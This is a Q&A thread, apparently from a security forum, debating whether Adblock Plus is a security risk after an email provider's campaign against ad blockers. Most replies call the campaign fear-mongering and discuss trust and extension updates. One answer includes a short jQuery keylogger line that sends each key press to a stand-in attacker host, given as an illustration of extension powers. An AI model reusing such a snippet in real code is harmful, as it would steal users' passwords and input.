Is Adblock (Plus) a security risk?

  • My email-provider's website (http://www.gmx.de) recently started linking to the (German) site http://www.browsersicherheit.info/ which basically claims that due to its capabilities to modify a site's appearance, Adblock Plus (and others) might actually be abused for phising. Here's a quote from that site plus its translation:

    Solche Add-ons haben Zugriff auf alle Ihre Eingaben im Browser und können diese auch an Dritte weitergeben – auch Ihr Bank-Passwort. Dies kann auf allen Web-Seiten passieren. Sicherheitsmechanismen wie SSL können das nicht verhindern.

    translated:

    Such addons can access all your browser's input and can also forward them to third parties - even your banking password. This can happen on all websites. Security mechanisms such as SSL cannot avoid that.

    Ok, they mention other (pretty obviously crapware) addons, but is Adblock Plus really a security threat or do that site's operators simply use the opportunity to try and scare inexperienced users into viewing their ads again?

    This boils down to: Don't run any applications you don't trust. If Adblock were evil, it could steal your login data. If any other executable you run were evil it could do so as well.

    Just for humor's sake: Why don't you use Ghostery? ;-)

    Can you clarify the question? Are you asking if Addons like Adblock could _theoretically_ be a security risk, or are you asking if Adblock is _currently_ a security risk?

    @MooingDuck Good point - I'm asking about _currently_, since theoretically that should be clearly possible, right?

    I wonder how many users started using Adblock Plus after reading all the articles about this? Some entities should really consider the Streisand effect before starting a blackmail campaign.

    **Update:** The FUD-site admins (or Adblock itself :) meanwhile removed the adblockers from the list of "bad-ons" (oh dear, that word-creation alone makes me think of B-movies). In addition, Adblock now offered me the option to hide FUD-banners on GMX's homepage. Guess that's not exactly the effect they hoped for...

    To be fair, there's been a large number of malware adblock clones in the Chrome webstore. I've reported a few before and eventually got them taken down but have given up now. Some went as far as copying the exact descriptions and icons from the legitimate adblock extensions to get hits. You couldn't tell the difference between `Adblock` and `Adb1ock`. Then with all the fake 5-star ratings... it's hard to tell what is actually legitimate. Just look at all the "Adblock for XXX" extensions that claim to work and all the comments that state otherwise. Just be smart about what you download people.

    @JeffMercado Isn't that a serious problem with Chrome's webstore then? I don't remember such BS happening at Mozilla...

    It is, definitely. I'm just saying, people can be mislead to think that these clones come from the makers of the legitimate adblock versions. They might think that clone adblock was a scam so all of adblock (clone or not) are scams. It's possible that someone at GMX got burned by this and without really researching this, pushed for this campaign.

    It is open source software after all, that should kill tihs issue once and for all.

    Conversely, Adblock is a form of security. Before installing it on Android, I was bombarded with ads prompting me to install an advertiser's app.

    @TheRookierLearner could you expand on Ghostery, please?

    @Federico Basically it shows and lets you block any tracking, adding and nagging parts of websites: https://www.ghostery.com/

    Tobias, I know and I use it, I was asking because the question of @TheRookierLearner seemed sarcastic and I couldn't understand.

    @Federico I thinks their point was to mockingly suggest using another addon to check how trustworthy adblock is, which merely delegates ones trust from adblock to ghostery...

    @Federico - Ya, I am indeed suggesting another add-on. On a different note (about the point that there are multiple add-ons), if you search Google Web Store of extensions for "adblock" you'd get many results like "adblock pro", "adblock premium", "adblock plus" (and the list goes on) and you don't know which is the legit one. Search for "ghostery" on te other hand, you get only one extension. I'm not a fan of ghostery but for some reason it doesn't seem to have multiple copy extensions (and doesn't add to confusion which "adblock" creates)

    For the sake of answer, I just went to Ghostery's website and found this: ` Also, its website clearly states:`Ghostery does not collect any data by default. You may choose to send us data by enabling the Ghostrank feature. ` (more in their privacy statement, EULA and FAQs). Again, I just want to assert that I'm not Ghostrey's fan or promoter (in-fact it sometimes breaks some pages and doesn't block the ads on YouTube) but it doesn't have the confusion (or other crap like "accessing user input") as is the case with other ad-blockers.

    I just thought it's important to share this. After using adblock plus I had malware issues. I had adblock installed on my android. I've had my phone for over a year with no issues. After using adblock I would get a popup to adcasch site everytime I unlock my screen. It was very suspicious because it appears in my phones default browser which I never use. I only ever use a third party installed Chrome. I have an anti virus on my phone. It scanned and found no threats. I suspected ad block as it was the last app a downloaded that gave so many permissions to the app. I disabled the app within my

    At best this is anecdotal evidence. Are you sure that you installed The real AdblockPlus from adblockplus.org? This isn't really an answer (yet).

    Just sharing: I stopped using Adblock Plus because it consumed too much resources on my computer at the time. Now I'm always using my custom VPN, so I made it also be a DNS server, and resolve the known ad and tracking hosts to `0.0.0.0`. Problem solved: ads and tracking unobtrusively disabled on the network level on all my devices configured to use this VPN.

  • Andalur

    Andalur Correct answer

    7 years ago

    It is not. This is a FUD (fear, uncertainty, and doubt) campaign by GMX because they want to display their ads. There is absolutely no security risk from the mentioned ad blockers. They added some crapware to the list to make it look more legitimate.

    Of course such campaigns are very unusual, especially from such a big and well known company like GMX. Unfortunately, I have no English source at hand (because it's a German only campaign) but since you speak German you may want to read this article at heise.de.

    Update #1: United Internet, the company behind GMX, received a lot of criticism for misleading customers by falsely claiming that there is a security risk on their PC. The Wall Street Journal (German edition) named the warnings displayed on GMX and the site they link to a "scare campaign".

    Update #2: GMX now says that they will no longer display the link when you use ad blockers but will still display it if you use crapware that injects adverts, the list at the site http://www.browsersicherheit.info/ has been updated accordingly and now lists only a small collection of crapware. This list is by no means complete so it is not a reliable source when you want to know if your browser has crapware installed. However, United Internet still maintains it's position that they do not want users who visit their sites to use ad blockers and said they will develop other anti-blocking methods in the future (German source).

    Thanks for the link, it basically boils down to your answer and goes on to explain that this campaign is not surprising after the announcement of suing Eyeo due to their "Accepable Adds" feature (link in German, too) - apparently the FUD is based on a Chrome incident

    Who do you trust more? ABP (which is under constant scrutiny and would be steam rolled if it replaced mybank.com with something else) or Some Random German Company? COULD an addon be used for `Evil Purposes`? Of course... but without proof it's just blind accusations and FUD.

    @WernerCD GMX is a major email provider, one of the top non-gmail providers. It's not "some random German company". And, of all the countries, a *German* company is the one you decide to mistrust?

    @Superbest GMX and other German e-mail providers also run the "E-Mail made in Germany" campaign where they mislead customers into thinking that mails send over their mail servers are safe from surveillance.

    @Superbest Well... if it isn't an American Companies, then it is some other random company. .. ... I jest I jest. But seriously, I would say the same for most companies - and would say the same if Comcast or Google told me to stop using ABP. You have to raise an eyebrow when a company that profits off of advertisements tells you to stop using an ad blocker.

    It's really kind of dishonest to say that there's ***no*** risk. However, the risks are small enough that I do agree that this is nothing more than a FUD campaign.

    The company behind AdblockPlus (Eyeo) is quite dubious [1], so warning users in general could be reasonable. Nevertheless, addons like Adblock Edge [2] that use (as far as I know) only open source Code based on the original Ablock seem to be more safe. So by looking at the design of the warning message, I also agree that this is mainly a perky FUD campaign intended to increase their ad revenues again. [1] http://www.mobilegeeks.de/adblock-plus-adblockgate-eyo-gmbh/ [2] https://addons.mozilla.org/de/firefox/addon/adblock-edge/

    @Superbest "_It's not "some random German company"._" But ADB is known worldwide (like Google). A scandal involving ADB would be great news for the world.

    A FUD campaign of this magnitude may be "unusual", but sites saying anything and everything they can to get their ads displayed is hardly a recent phenomenon. Some small, independent sites detect adblocking, and politely request that you disable it on their site because they rely on ad revenue. And then there are major corporate sites like www.denverbroncos.com, which displays a banner claiming "We noticed that you may have an Ad Blocker turned on. Please be aware that our site is best experienced with Ad Blockers turned off." without ever justifying that dubious claim. "Best" for WHOM?

    FUD can be true! It really is a risk. Third party software can do a lot if not everything (maybe through a hack you expose yourself to) on your computer. A small risk given what's happening. And because it's such a small risk it's FUD. But FUD can be true.

  • Update

    After thinking it over, I have to agree with the other answers in that, despite the fact that it CAN access your data, Adblock is more likely to protect your privacy than invade it. The real risk are malicious ads that prompt you to install software on your computer. Adblock prevents these.

    Below is the original, cautionary answer:

    Yes, it totally is.

    Adblock Plus is a browser extension/add-on developed by an independent developer. Adblock can access the DOM (document object model) on all pages.

    The way AdBlock works is that it injects script into your browser, which searches the DOM, and then runs a hide() function on what it determines are ads.

    That means AdBlock (and any Chrome extension with that permission) can access your DOM. Adblock cannot access JavaScript variables.

    What does this mean?

    If you are on a website with secure authentication, and there is a JavaScript object with something private like an AuthKey, you are safe. AdBlock cannot access JavaScript variables.

    However, AdBlock CAN run code equivalent to this.

    $(window).onKeyPress(function(e){$('html').append('<img src='http://mymalicioussite.com/stealData/keyPress.png?key=' + e.keyCode)})

    Which essentially will route any keys you press to a remote server.

    This can be used to steal your password which is even worse than stealing your token.

    That Being Said, Is AdBlock itself Dangerous?

    It seems to me that AdBlock is not overly dangerous as the developer has identified himself and it is used by millions of people. If it was doing the kind of trickiness as above, someone would have likely noticed and blown the whistle.

    But don't think Chrome Extensions are totally safe. All of them can steal any data, as well as other malicious things.

    What Else Can It Do?

    A Chrome Extension can also perform the following security violations quite trivially...

    • Route the content of any email or page you read to a third-party source (if this email contains unencrypted login information, you are busted) If you can see it on the screen, so can any Chrome Extension, no questions asked.
    • Enter information into a field and press the submit button, for example, send an e-mail
    • If you leave your browser open, and the extension knows how, it can use your email interface (Gmail, Outlook) to send e-mail of its choosing to your contacts. This is trivial.
    • Change the script associated with any button, if that was originally put in with jQuery. For example, the button that sends your sign-in information to the server can be changed slightly to send that information to both the server and http://mymaliciousserver. This is trivial.

    Update

    It has been verified through discussion that AdBlock is open source. This should let you trust AdBlock more, but remember it is still capable of doing those things. I've reviewed the source and I can safely say I haven't any idea at all what's going on.

    Source: I am a JavaScript and Chrome Extension developer.

    This is only about one ad blocker... There are many different ad blockers in the list, and they use many different methods of blocking I think...

    If it's a Chrome Extension, and you allow it to access your data on all pages, then it can do all those things. Almost all Chrome Extensions ask for this permission, and with AdBlocker it's required even to work, if you think about it.

    Wasn't AdBlock Plus open source? (;

    @FranciscoPresencia Link Please?

    Great answer about the _potential_ of addons, though slightly too fear-inducing title IMHO (I'm using Firefox btw, but I guess almost the same applies there)

    Up-vote for both a good answer (whether or not an application will do it, this is the information security stackexchange and such questions deserve detailed answers) and for the name... what was in the box?

    The link has already been posted by @TobiasKienzler. Also, a hint was the big green sign in the main page that said *Open Source*.

    @TobiasKienzer This is awesome. Excuse me while I fork AdBlock and begin my project of AdTeese, which replaces every add with a sized pin-up of Dita von Teese.

    "open-source" means nothing if the source you're looking at is not the same source as the extension uses. I have published the Chrome extension source viewer that allows one to view the real source of an extension (= the one that is going to be used when you install an extension). Of course, you have to trust that the extension does what it promises, i.e. display correct source code instead of some censored one. It all boils down to "only install software from publishers you trust").

    @itcouldevenbeaboat Please do, I would use it :-)

    @TobiasKienzler It looks like Firefox has a stricter review process which seems to have a greater focus on manual reviews. Of course, it's not foolproof (and comes with longer update times while waiting for approval), but it might be more than Chrome does - Google's not very explicit about how they review.

    There is no such thing as a "*JavaScript object with something private*" - unless it's useless. Even if a plugin does not access local variables, once it has access to the page (DOM, script injection) it can compromise everything that happens with JS, as all side-effect interfaces are public.

    This is a great quotation that could apply to most software: "I've reviewed the source and I can safely say I haven't any idea at all what's going on."

    @Bergi Actually, Google Chrome Extensions run in a VM Sandbox, and can't access JavaScript variables on the page by any means I know of.

    @itcouldevenbeaboat an extension can use a content script to inject a script element into the dom, which will run in the webpage javascript context.

    @itcouldevenbeaboat Content scripts are *not* run in a virtual machine. The JavaScript execution contexts are indeed separated, but the DOM is shared. Consequently, content scripts can run code in the context of the web page by inserting script tags, running event handlers, etc.

    @RobW This is interesting. Can you describe a way of accessing a window variable on a page, say, `myVariable`, from a Chrome Extension, and I'll check it out?

    @itcouldevenbeaboat See answers and linked answers at http://stackoverflow.com/q/9515704

    Can it insert tags? Or <iframe> tags? Can eventhandler code access variables? Can in some way the JS variables be exposed?

    *"I've reviewed the source and I can safely say I haven't any idea at all what's going on. Source: I am a JavaScript and Chrome Extension developer."* So you are a developer who cannot read code? Either that, or you only looked at the code for 40 seconds without reading it. Either way, good job of trying to scare users, you've successfully made it into the FUD ranks of GMX. Do you also happen to work in the advertisements industry?

  • This really comes down to an issue of trust. It is true that today, the AdBlock extension is safe. We know that it will not steal your data, even though—as the other answers point out—it has the technical ability to do so.

    However, Chrome extensions are silently and automatically updated.

    Do you trust that the developer of the AdBlock extension will not add malicious code? I personally do – with millions of users, malicious code would be noticed quickly and would undoubtedly be a career killer for the developer.

    Even if you do trust the developer, there are still unlikely scenarios that could expose you:

    For the paranoid, these issues could be mitigated by:

    • Only logging in to sensitive sites (ie banking) using Incognito mode (where extensions are disabled by default).
    • Disabling automatic extension updates, but you obviously lose a lot of convenience.

    So while it is intellectually dishonest to say, "no, there is no risk," the risk is completely overblown by GMX. Just as I trust Google to give me a browser that does not steal my personal data, I trust the AdBlock developer to give me an extension that does not steal my data.

    The risk of the extension being updated with malicious code is small enough that I don't worry about it, and if I did have the slightest concern, it's easy enough to disable the extension.

    "Trust Google to give me a browser"... stunned by the fact that the words "Google" and "trust" are used in one sentence.

    Good points indeed - the same applies for Firefox of course

    Hahaha - I trust google to provide a browser that does steal my data, but at least I have a reasonable idea of all the things they will do with my data, and I have currently bought into that model and manage that data set accordingly.

    Well... the *browser* itself won't steal your data; of course, the services that come with it are another story. Don't sign the browser into a Google account and uncheck all the boxes in the Privacy settings (or use Incognito), and you won't leak anything to Google. The same applies with Firefox and IE.

    There have already been cases where developers of chrome extensions have sold their IP to another party who has not had the same ethics, security precautions etc. This is not to say AdBlock is a risk. It just emphasises that when you use an extension, you need to recognise that the situation can change and something you trusted and were confident about may end up evolving into something less trustworthy.

  • All software is a security risk, but in this case their claim is misleading.

    Just like all advice is potentially bad and and all transactions are potentially fraudulent. "Risk" just means your security isn't guarenteed, with is true in 100% of cases.

    But in the case of AdBlock Plus, the software is well-understood and developed by a team that has a track record of protecting the interests of its users. Plus it's open-source, so the source code is available for you to examine yourself for any security issues. So in this case, the risk is minimal; trivial even.

    Instead, GMX is using a truism ("software is always risky") to suggest that this software is dangerous, which is misleading at best, and possibly defamatory. It's like a resturaunt owner handing out leaflets saying his competitors could be poisoning their own food. Technically it's true, since you said "could be" instead of "are", but the action is fundamentally dishonest nonetheless.

    I just wish they were more honest as in "Please support our service by viewing our ads. Or else."

  • Just an observation - I tend to promote ad blockers especially for my less savvy friends and associates - precisely because it reduces security threats. How? Because much of the most malicious content on the web comes in the form of a misleading advertisement like "click here to make your pc faster"... These largely disappear with an ad blocker.

    followed by the "you seem to have a virus, download 'anti'-virus now" - best reason why someone clicked this: "It didn't go away after clicking 'no', so I chose 'ok'" m-/

    If a site said "Please don't use an ad blocker on this site; they help us pay the bills and we promise not sell ad space to any malicious content." I'd feel obliged to turn my ad blocker off on that site.

    Exactly, that's what I do on the entire SE network

    I'm not using adblockers, as I know it helps pay the bills on most sites I'm visiting. I would love to have a partial ad-blocker, which would only block ads that are known to be malicious. I'm also fine with obtrusive ads (flash, gif, videos, etc.), that are not malicious, just trying to grab attention, so Adblock Plus's lesser filter is still not okay for me.

  • Adblock (as other extensions and, for that matter, browser developers) has the technical ability to get a lot of your data, and you have all the risks commonly associated with running third-party applications - namely, that the vendor can be malicious, and there may be bugs in their software that break your security.

    That being said, I'd consider AdBlock as a defence against phishing. A lot of questionable software gets pushed to users through ads masquerading as something else - i.e., a site offers some item that a user wants, but has an ad that looks like a download button, and delivers some adware/malware product instead of the actual content on site, and such 'accidentally' downloaded malware is a serious security risk. Similarly, there have been incidents of mass consumer attacks by running an ad banner containing a zeroday exploit, which would cause the exploit to appear on respected, well trusted sites.

    For company-wide security practices, it may make sense to require AdBlock and install it by default on every workstation - since it is especially useful to protect the inexperienced users who wouldn't install it themselves. This would cause a risk by trusting one more software product, but would be a net positive for everyday security.

    interesting point, though for company-wide use I'd consider using a local fork that gets updated only after a sufficiently thorough review of the changes made

    Yes, a trusted&verified fixed version is great - again, that's just treating adblock risks exactly as you should treat any other commonly installed software and it's upgrades.

  • The way this information is spread by United Internet is misleading (I am trying hard to avoid saying "libel"). The allegation as it stands is clearly wrong by all objective means, and the presentation is defamatory.

    Of course, in principle, one has to admit that Adblock (Plus) is of course a potential security risk. Whether this risk warrants a reasonable concern is another thing.

    Adblock (Plus) might be a security risk for three reasons:

    1. It is software that runs on your computer, which could, like all software, in principle do almost anything. Including showing false information or stealing your data.
    2. It does modify web page contents, that is what blocking ads is about. Certainly, a software which is well-known to modify the contents of web pages could modify the contents in a malicious way and go unnoticed much easier than another software.
    3. It performs this task by matching a downloadable list of regular expressions from a range of (uncontrolled/unknown) third parties, such as EasyList

    So, if you are in ultra-paranoia mode, you might fear that either someone at EasyList (or another filter list provider) modifies the filter list so they do something malicious, or a hacker hijacks the site. Your Adblock Plus addon would presumably download the malicious list during its daily/weekly update without knowing and without a means of verification (there is a checksum that can be embedded, but this only protects from accidential corruption, not malicious modification).
    As a result, such a malicious block list could in theory cause the addon to do "evil things".

    Luckily, apart from JS exploits, there is not too much harm that could realistically be done via this attack vector due to the way Adblock works (it will match an arbitrary regex, but it won't do arbitrary susbstitutions, so hiding some elements it shouldn't hide or letting some ads through is pretty much the worst possible case).
    On the other hand, a JS exploit could be used against you without Adblock Plus running in the first place.

    Also, obviously, like any third party software (including Firefox or Chrome itself!) the Adblock Plus addon itself could steal your data. All you can say at the present time is that so far this has not happened.
    Then again, almost all of the big commercial players in the business are doing untrustworthy things on a daily base, which nobody objects against.

    Now you have to ask yourself how likely it is that Adblock Plus will indeed steal user data, and how likely it is that such a thing would go undetected for longer than a day or two on a widely-deployed open-source project.

    Frankly, if you believe that this is a serious and realistic threat which is likely to affect you, then you must also believe that the Microsoft in collaboration with the NSA already builds identity theft functionality right into Windows and that every computer has a secret "kill switch" which the US DoD can activate at will (that too, is in principle possible, and it's actually more likely to be true than the author of Adblock stealing your savings).

    You should not trust GMX either in this case, since they will (note the wording, will, not may) share all your personal data and traffic information in a malicious and unethical way with other parties (at least with US agencies, due to Schröder's 2001 treaty, but you have no way of telling with whom else).
    You also shouldn't trust 1&1 (another member of United Internet) because they will share your personal data with who-knows-whom (being an US based company). Nor Google, nor the other half of the internet for that matter.

    On the other hand, Adblock Plus has demonstrably prevented malware from being installed on users' computers in the past.

  • The other answers forget to mention the issue aside from trust: That adblock is modifying pages you visit. This and having to trust more developers is why I have never used ad blocking software/browser plugins, and strongly recommend against it.

    It is well known that websites depend on all kinds of fragile invariants for security. For example, just look at the ways clickjacking has been addressed in the past. There is nothing stopping adblock from mistakenly violating an invariant that the site depends on for security.

    Also adblock and other ad blocking software decrease anonymity. An adversary can either make you run code to browse the DOM tree and look for missing parts / alterations, or passively observe that you aren't making certain requests to fetch ad-related content (some of which may be hosted on the site itself, making it a possible adversary).

    How many people use Adblock* with EasyList and no other filters?

  • Something no-one has mentioned here is that Adblock plus along almost all other browsers and extensions can be updated remotely. This means there must be a backdoor in the program even if it is locked down to specific "trustworthy" update URLs. This could be interpreted as spyware, but spyware is a somewhat abstract term.

    It's true that most people have said it is not safe as it has permissions to read and send data although it's widely accepted that Adblock plus in particular is not malicious. Despite for the most part being open source (Adblock included) browser software and extensions are only as secure as the update URLs for which there is no way of knowing how secure they actually are as the code for these services is remote and therefore not accessible.

    Obviously no software or server can be 100% secure due to entropy and having users, but to obtain the highest possible security you should study the source code, always build from source and disable automatic updating. Like with all software, browsers and extensions are only as secure as the user makes them.

    *"Something no-one has mentioned here is that Adblock plus along almost all other browsers and extensions can be updated remotely."* Read again; this has been mentioned.

    Oh sorry, my mistake. I assumed so since your post is more towards the bottom than the one that originally mentioned it (oftentimes posts are very roughly in chronological order), but of course I should have checked. I stand corrected :)

License under CC-BY-SA with attribution


Content dated before 6/26/2020 9:53 AM